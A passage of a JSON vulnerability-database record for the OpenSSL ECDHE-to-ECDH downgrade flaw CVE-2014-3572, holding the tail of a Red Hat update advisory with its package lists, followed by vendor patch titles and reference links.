7):\n\nSource:\nopenssl-1.0.1e-34.el7_0.7.src.rpm\n\nppc64:\nopenssl-1.0.1e-34.el7_0.7.ppc64.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.ppc.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.ppc64.rpm\nopenssl-devel-1.0.1e-34.el7_0.7.ppc.rpm\nopenssl-devel-1.0.1e-34.el7_0.7.ppc64.rpm\nopenssl-libs-1.0.1e-34.el7_0.7.ppc.rpm\nopenssl-libs-1.0.1e-34.el7_0.7.ppc64.rpm\n\ns390x:\nopenssl-1.0.1e-34.el7_0.7.s390x.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.s390.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.s390x.rpm\nopenssl-devel-1.0.1e-34.el7_0.7.s390.rpm\nopenssl-devel-1.0.1e-34.el7_0.7.s390x.rpm\nopenssl-libs-1.0.1e-34.el7_0.7.s390.rpm\nopenssl-libs-1.0.1e-34.el7_0.7.s390x.rpm\n\nx86_64:\nopenssl-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-devel-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-libs-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64:\nopenssl-debuginfo-1.0.1e-34.el7_0.7.ppc.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.ppc64.rpm\nopenssl-perl-1.0.1e-34.el7_0.7.ppc64.rpm\nopenssl-static-1.0.1e-34.el7_0.7.ppc.rpm\nopenssl-static-1.0.1e-34.el7_0.7.ppc64.rpm\n\ns390x:\nopenssl-debuginfo-1.0.1e-34.el7_0.7.s390.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.s390x.rpm\nopenssl-perl-1.0.1e-34.el7_0.7.s390x.rpm\nopenssl-static-1.0.1e-34.el7_0.7.s390.rpm\nopenssl-static-1.0.1e-34.el7_0.7.s390x.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-static-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-static-1.0.1e-34.el7_0.7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nopenssl-1.0.1e-34.el7_0.7.src.rpm\n\nx86_64:\nopenssl-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-devel-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-libs-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm\nopenssl-static-1.0.1e-34.el7_0.7.i686.rpm\nopenssl-static-1.0.1e-34.el7_0.7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2014-3570\nhttps://access.redhat.com/security/cve/CVE-2014-3571\nhttps://access.redhat.com/security/cve/CVE-2014-3572\nhttps://access.redhat.com/security/cve/CVE-2014-8275\nhttps://access.redhat.com/security/cve/CVE-2015-0204\nhttps://access.redhat.com/security/cve/CVE-2015-0205\nhttps://access.redhat.com/security/cve/CVE-2015-0206\nhttps://access.redhat.com/security/updates/classification/#moderate\nhttps://www.openssl.org/news/secadv_20150108.txt\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2015 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFUwCWMXlSAg2UNWIIRAioBAJ4/RjG4OGXzCwg+PJJWNqyvahe3rQCeNE+X\nENFobdxQdJ+gVAiRe8Qf54A=\n=wyAg\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n", "sources": [ { "db": "NVD", "id": "CVE-2014-3572" }, { "db": "JVNDB", "id": "JVNDB-2014-007553" }, { "db": "BID", "id": "71942" }, { "db": "VULMON", "id": "CVE-2014-3572" }, { "db": "PACKETSTORM", "id": "133317" }, { "db": "PACKETSTORM", "id": "130985" }, { "db": "PACKETSTORM", "id": "133316" }, { "db": "PACKETSTORM", "id": "130987" }, { "db": "PACKETSTORM", "id": "129870" }, { "db": "PACKETSTORM", "id": "133325" }, { "db": "PACKETSTORM", "id": "129867" }, { "db": "PACKETSTORM", "id": "130051" } ], "trust": 2.7 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2014-3572", "trust": 3.0 }, { "db": "JUNIPER", "id": "JSA10679", "trust": 1.4 }, { "db": "BID", "id": "71942", "trust": 1.4 }, { "db": "MCAFEE", "id": "SB10102", "trust": 1.1 }, { "db": "MCAFEE", "id": "SB10108", "trust": 1.1 }, { "db": "SECTRACK", "id": "1033378", "trust": 1.1 }, { "db": "JVN", "id": "JVNVU98974537", "trust": 0.8 }, { "db": "JVN", "id": "JVNVU91828320", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2014-007553", "trust": 0.8 }, { "db": "VULMON", "id": "CVE-2014-3572", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "133317", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130985", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "133316", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130987", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "129870", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "133325", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "129867", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130051", "trust": 0.1 } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-3572" }, { "db": "BID", "id": "71942" }, { "db": "JVNDB", "id": "JVNDB-2014-007553" }, { "db": "PACKETSTORM", "id": "133317" }, { "db": "PACKETSTORM", "id": "130985" }, { "db": "PACKETSTORM", "id": "133316" }, { "db": "PACKETSTORM", "id": "130987" }, { "db": "PACKETSTORM", "id": "129870" }, { "db": "PACKETSTORM", "id": "133325" }, { "db": "PACKETSTORM", "id": "129867" }, { "db": "PACKETSTORM", "id": "130051" }, { "db": "NVD", "id": "CVE-2014-3572" } ] }, "id": "VAR-201501-0436", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.36198661599999993 }, "last_update_date": "2024-07-23T21:40:45.003000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "APPLE-SA-2015-04-08-2 OS X 10.10.3 and Security Update 2015-004", "trust": 0.8, "url": "http://lists.apple.com/archives/security-announce/2015/apr/msg00001.html" }, { "title": "HT204659", "trust": 0.8, "url": "https://support.apple.com/en-us/ht204659" }, { "title": "HT204659", "trust": 0.8, "url": "https://support.apple.com/ja-jp/ht204659" }, { "title": "cisco-sa-20150310-ssl", "trust": 0.8, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20150310-ssl" }, { "title": "ECDH downgrade bug fix.", "trust": 0.8, "url": "https://github.com/openssl/openssl/commit/b15f8769644b00ef7283521593360b7b2135cb63" }, { "title": "HPSBUX03244 SSRT101885", "trust": 0.8, "url": "http://h20565.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04556853\u0026lang=en\u0026cc=us" }, { "title": "HPSBGN03299", "trust": 0.8, "url": "http://marc.info/?l=bugtraq\u0026m=142720981827617\u0026w=2" }, { "title": "HPSBHF03289", "trust": 0.8, "url": "http://marc.info/?l=bugtraq\u0026m=142721102728110\u0026w=2" }, { "title": "NV15-017", "trust": 0.8, "url": "http://jpn.nec.com/security-info/secinfo/nv15-017.html" }, { "title": "ECDHE silently downgrades to ECDH [Client] (CVE-2014-3572)", "trust": 0.8, "url": "https://www.openssl.org/news/secadv_20150108.txt" }, { "title": "Text Form of Oracle Critical Patch Update - July 2016 Risk Matrices", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpujul2016verbose-2881721.html" }, { "title": "Oracle Critical Patch Update Advisory - July 2015", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html" }, { "title": "Text Form of Oracle Critical Patch Update - July 2015 Risk Matrices", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpujul2015verbose-2367947.html" }, { "title": "Oracle Critical Patch Update Advisory - April 2015", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2015-2365600.html" }, { "title": "Text Form of Oracle Critical Patch Update - April 2015 Risk Matrices", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2015verbose-2365613.html" }, { "title": "Oracle Critical Patch Update Advisory - October 2015", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html" }, { "title": "Text Form of Oracle Critical Patch Update - October 2015 Risk Matrices", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2015verbose-2367954.html" }, { "title": "Oracle Critical Patch Update Advisory - July 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html" }, { "title": "Oracle Third Party Bulletin - January 2015", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/bulletinjan2015-2370101.html" }, { "title": "RHSA-2015:0066", "trust": 0.8, "url": "https://rhn.redhat.com/errata/rhsa-2015-0066.html" }, { "title": "July 2016 Critical Patch Update Released", "trust": 0.8, "url": "https://blogs.oracle.com/security/entry/july_2016_critical_patch_update" }, { "title": "July 2015 Critical Patch Update Released", "trust": 0.8, "url": "https://blogs.oracle.com/security/entry/july_2015_critical_patch_update" }, { "title": "April 2015 Critical Patch Update Released", "trust": 0.8, "url": "https://blogs.oracle.com/security/entry/april_2015_critical_patch_update" }, { "title": "October 2015 Critical Patch Update Released", "trust": 0.8, "url": "https://blogs.oracle.com/security/entry/october_2015_critical_patch_update" }, { "title": "cisco-sa-20150310-ssl", "trust": 0.8, "url": "http://www.cisco.com/cisco/web/support/jp/112/1128/1128755_cisco-sa-20150310-ssl-j.html" }, { "title": "TLSA-2015-2", "trust": 0.8, "url": "http://www.turbolinux.co.jp/security/2015/tlsa-2015-2j.html" }, { "title": "\u682a\u5f0f\u4f1a\u793e\u30d0\u30c3\u30d5\u30a1\u30ed\u30fc \u306e\u544a\u77e5\u30da\u30fc\u30b8", "trust": 0.8, "url": "http://buffalo.jp/support_s/s20150327b.html" }, { "title": "Red Hat: Moderate: openssl security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20150066 - security advisory" }, { "title": "Red Hat: CVE-2014-3572", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2014-3572" }, { "title": "Ubuntu Security Notice: openssl vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2459-1" }, { "title": "Debian Security Advisories: DSA-3125-1 openssl -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=a3210fee56d96657bbff4ad44c3d0807" }, { "title": "Amazon Linux AMI: ALAS-2015-469", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2015-469" }, { "title": "Splunk Security Announcements: Splunk Enterprise versions 6.1.7, 6.0.8, and 5.0.12 address two vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=splunk_security_announcements\u0026qid=e17c368f43499efc420edc223af663db" }, { "title": "Symantec Security Advisories: SA88 : OpenSSL Security Advisory 08-Jan-2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=9281dc3b1a760e1cf2711cdf82cf64d7" }, { "title": "Apple: OS X Yosemite v10.10.3 and Security Update 2015-004", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=apple_security_advisories\u0026qid=aa5ab46566482c02434bb8cf65c9614e" }, { "title": "Cisco: Multiple Vulnerabilities in OpenSSL (January 2015) Affecting Cisco Products", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-20150310-ssl" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - April 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=4b527561ba1a5de7a529c8a93679f585" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=744c19dc9f4f70ad58059bf8733ec9c1" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - January 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=eaf98750f1130c39e83765575c69e165" }, { "title": "Splunk Security Announcements: Splunk Enterprise 6.2.2 addresses two vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=splunk_security_announcements\u0026qid=d9c34d2680d213e5c9dae973a42328f1" }, { "title": "Citrix Security Bulletins: Multiple Security Vulnerabilities in Citrix NetScaler Platform IPMI Lights Out Management (LOM) firmware", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=citrix_security_bulletins\u0026qid=eb059834b7f24e2562bcf592b6d0afbc" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=523d3f220a64ff01dd95e064bd37566a" }, { "title": "Splunk Security Announcements: Splunk response to January 2015 OpenSSL vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=splunk_security_announcements\u0026qid=21b119528a2fb8c78850a17027b71424" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - July 2015", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=459961024c4bdce7bb3a1a40a65a6f2e" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - July 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=3a04485ebb79f7fbc2472bf9af5ce489" }, { "title": "JPN_RIC13351-2", "trust": 0.1, "url": "https://github.com/neominds/jpn_ric13351-2 " }, { "title": "The Register", "trust": 0.1, "url": "https://www.theregister.co.uk/2015/01/09/dead_openssl_bugs_more_fleas_than_poodles/" } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-3572" }, { "db": "JVNDB", "id": "JVNDB-2014-007553" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-310", "trust": 1.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-007553" }, { "db": "NVD", "id": "CVE-2014-3572" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.7, "url": "https://www.openssl.org/news/secadv_20150108.txt" }, { "trust": 1.4, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20150310-ssl" }, { "trust": 1.4, "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2015-2365600.html" }, { "trust": 1.4, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html" }, { "trust": 1.4, "url": "https://support.citrix.com/article/ctx216642" }, { "trust": 1.2, "url": "http://rhn.redhat.com/errata/rhsa-2015-0066.html" }, { "trust": 1.1, "url": "https://github.com/openssl/openssl/commit/b15f8769644b00ef7283521593360b7b2135cb63" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/71942" }, { "trust": 1.1, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2015:019" }, { "trust": 1.1, "url": "http://www.debian.org/security/2015/dsa-3125" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142496289803847\u0026w=2" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-01/msg00021.html" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142720981827617\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142721102728110\u0026w=2" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-03/msg00027.html" }, { "trust": 1.1, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2015:062" }, { "trust": 1.1, "url": "https://support.apple.com/ht204659" }, { "trust": 1.1, "url": "http://lists.apple.com/archives/security-announce/2015/apr/msg00001.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00026.html" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=144050297101809\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=144050254401665\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=143748090628601\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=144050155601375\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142895206924048\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=144050205101530\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142496179803395\u0026w=2" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/topics/security/bulletinjan2015-2370101.html" }, { "trust": 1.1, "url": "https://bto.bluecoat.com/security-advisory/sa88" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00011.html" }, { "trust": 1.1, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10679" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1033378" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00037.html" }, { "trust": 1.1, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10108" }, { "trust": 1.1, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10102" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html" }, { "trust": 0.9, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3572" }, { "trust": 0.8, "url": "https://jvn.jp/vu/jvnvu98974537/index.html" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu91828320/index.html" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-3572" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3572" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0204" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3570" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8275" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0205" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3571" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0206" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3569" }, { "trust": 0.5, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/" }, { "trust": 0.5, "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins" }, { "trust": 0.4, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04765169" }, { "trust": 0.3, "url": "http://www.pexip.com/sites/pexip/files/pexip_security_bulletin_2015-01-30.pdf" }, { "trust": 0.3, "url": "http://www.splunk.com/view/sp-caaanv8#announce1" }, { "trust": 0.3, "url": "http://openssl.org/" }, { "trust": 0.3, "url": "http://www.splunk.com/view/sp-caaanu5#affectedproductsandcomponents" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21699883" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21699667" }, { "trust": 0.3, "url": "http://seclists.org/bugtraq/2015/feb/160" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10679\u0026cat=sirt_1\u0026actp=list" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04746490" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04602055" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04765115" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04774019" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04774021" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21698818" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21883857" }, { "trust": 0.3, "url": "https://aix.software.ibm.com/aix/efixes/security/openssl_advisory12.asc" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21699271" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/101008182" }, { "trust": 0.3, "url": "https://www.openssl.org/news/vulnerabilities.html" }, { "trust": 0.3, "url": "https://www.alienvault.com/forums/discussion/4475/security-advisory-alienvault-v4-15-1-addresses-twenty-20-vulnerabilities" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21963783" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098593" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903299" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1022575" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005159" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21700275" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21699938" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097733" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005170" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097503" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21883287" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097811" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097504" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21902694" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903726" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097796" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21697162" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097823" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005150" }, { "trust": 0.3, "url": "http://www.splunk.com/view/sp-caaanxd" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1009328" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21695985" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21701453" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21694849" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097360" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21699052" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21699810" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21699069" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2014-3572" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0209" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0286" }, { "trust": 0.2, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2014-8275" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/310.html" }, { "trust": 0.1, "url": "https://access.redhat.com/errata/rhsa-2015:0066" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/2459-1/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0288" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5432" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5433" }, { "trust": 0.1, "url": "http://www.hp.com/jp/icewall_patchaccess" }, { "trust": 0.1, "url": "https://access.redhat.com/articles/1369543" }, { "trust": 0.1, "url": "https://h20392.www2.hp.com/portal/swdepot/displayinstallinfo.do?produ" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5409" }, { "trust": 0.1, "url": "http://h20566.www2.hpe.com/hpsc/doc/public/display?calledby=search_result\u0026doc" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5412" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5413" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-20861d704bc04221a1518b7cb6" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5410" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5411" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0235" }, { "trust": 0.1, "url": "http://ftp.hp.com/pub/tcdebian/updates/4.2/service_packs/security-sp-2.0-all-" }, { "trust": 0.1, "url": "http://ftp.hp.com/pub/tcdebian/updates/4.3/service_packs/security-sp-2.0-all-" }, { "trust": 0.1, "url": "http://ftp.hp.com/pub/tcdebian/updates/5.1/service_packs/security-sp-2.1-all-" }, { "trust": 0.1, "url": "http://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/security-sp-2.1-all-" }, { "trust": 0.1, "url": "http://ftp.hp.com/pub/tcdebian/updates/5.0/service_packs/security-sp-2.1-all-" }, { "trust": 0.1, "url": "http://ftp.hp.com/pub/tcdebian/updates/4.1/service_packs/security-sp-2.0-all-" }, { "trust": 0.1, "url": "http://ftp.hp.com/pub/softpaq/sp70501-71000/sp70649.exe" }, { "trust": 0.1, "url": "http://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/security-sp-2.0-all-" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-8275" }, { "trust": 0.1, "url": "http://www.mandriva.com/en/support/security/" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0204" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3570" }, { "trust": 0.1, "url": "http://www.mandriva.com/en/support/security/advisories/" }, { "trust": 0.1, "url": 